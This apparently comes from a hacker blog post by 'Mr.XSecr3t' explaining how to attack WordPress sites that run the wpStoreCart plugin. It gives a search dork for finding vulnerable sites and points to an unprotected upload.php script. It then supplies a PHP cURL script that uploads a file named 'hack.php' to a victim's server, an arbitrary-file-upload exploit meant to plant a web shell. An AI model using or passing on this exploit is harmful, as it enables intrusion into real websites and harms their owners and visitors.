Unknown On 11/06/16


Dork : inurl:/wp-content/plugins/wpstorecart/
Click Some Targets
Go To Dir > wpstorecart/wpstorecart/admin/php/
Find > upload.php
Vuln : blank
Execution ? use your brain :))
CSRF :

<?php

$uploadfile="hack.php";
$ch = 
curl_init("http://target.com/wp-content/plugins/wpstorecart/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";


?>
Note* for now,i just test upload pic :) ~
Path Upload ? use your brain ;) ...
That’s All

By Mr.XSecr3t

Leave a Reply

Subscribe to Posts | Subscribe to Comments